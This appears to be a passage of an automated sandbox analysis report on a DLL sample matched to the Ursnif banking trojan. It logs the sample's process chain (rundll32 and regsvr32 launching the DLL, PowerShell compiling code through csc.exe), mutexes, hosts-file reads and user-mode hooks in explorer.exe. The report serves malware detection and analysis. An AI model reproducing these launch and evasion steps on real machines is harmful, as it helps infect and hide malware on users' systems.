          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
          Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211214
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
          Source: classification engineClassification label: mal100.troj.evad.winDLL@59/52@18/5
          Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E3309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_013E3309
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{90B75C82-AFA5-4217-B9C4-5396FD38372A}
          Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{94968C51-E390-E6C0-0D08-C77A91BCEB4E}
          Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{BC369832-EBA2-4EDB-55B0-4F6259E4F3B6}
          Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{9CBC1CBB-4BAF-2EBC-B590-AF42B9C45396}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
          Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{20549BFE-FFF8-5232-8954-A3A6CDC8873A}
          Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{10D8DBC1-2F4C-C28B-3944-D3167DB8B7AA}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
          Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
          Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{B8576863-B7B7-AA31-016C-DB7EC5603F92}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{C44FC282-5318-9641-FD38-372A81EC5BFE}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: 61b85f75e6a7c.dllStatic file information: File size 1781920 > 1048576
          Source: 61b85f75e6a7c.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
          Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EE97E pushad ; iretd 0_2_013EE982
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EAD40 push ecx; ret 0_2_013EAD49
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EB073 push ecx; ret 0_2_013EB083
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0104C85E pushfd ; iretd 0_2_0104C869
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010492B3 push ecx; ret 0_2_010492C3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01048D80 push ecx; ret 0_2_01048D89
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0827 push dword ptr [ebp-00000284h]; ret 0_2_013A087F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A08B7 push dword ptr [ebp-00000284h]; ret 0_2_013A0A65
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A08B7 push dword ptr [ebp-0000028Ch]; ret 0_2_013A0AB9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A08B7 push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A08B7 push dword ptr [esp+10h]; ret 0_2_013A0BFB
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0880 push dword ptr [ebp-00000284h]; ret 0_2_013A08B6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0BFC push dword ptr [esp+0Ch]; ret 0_2_013A0C10
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0BFC push dword ptr [esp+10h]; ret 0_2_013A0C56
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0A66 push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0ABA push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A06F5 push dword ptr [ebp-00000284h]; ret 0_2_013A0764
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0EC5 push 10021990h; ret 0_2_013A0ECC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049DB073 push ecx; ret 3_2_049DB083
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049DAD40 push ecx; ret 3_2_049DAD49
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_049DE97E pushad ; iretd 3_2_049DE982
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0BFC push dword ptr [esp+0Ch]; ret 3_2_030E0C10
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0BFC push dword ptr [esp+10h]; ret 3_2_030E0C56
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0827 push dword ptr [ebp-00000284h]; ret 3_2_030E087F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0A66 push edx; ret 3_2_030E0B11
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0880 push dword ptr [ebp-00000284h]; ret 3_2_030E08B6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0ABA push edx; ret 3_2_030E0B11
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E08B7 push dword ptr [ebp-00000284h]; ret 3_2_030E0A65
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E08B7 push dword ptr [ebp-0000028Ch]; ret 3_2_030E0AB9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E08B7 push edx; ret 3_2_030E0B11
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E08B7 push dword ptr [esp+10h]; ret 3_2_030E0BFB
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,0_2_010449B3
          Source: jtmpm3o0.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x661a
          Source: hupbkl0t.dll.41.drStatic PE information: real checksum: 0x0 should be: 0x8132
          Source: wnczrnms.dll.46.drStatic PE information: real checksum: 0x0 should be: 0x9e33
          Source: kon0vos3.dll.38.drStatic PE information: real checksum: 0x0 should be: 0x7727
          Source: 61b85f75e6a7c.dllStatic PE information: real checksum: 0x1ba6ec should be: 0x1c2401
          Source: gmpgobli.dll.48.drStatic PE information: real checksum: 0x0 should be: 0x2130
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
          Hooks registry keys query functions (used to hide registry keys)Show sources
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
          Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
          Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
          Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
          Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
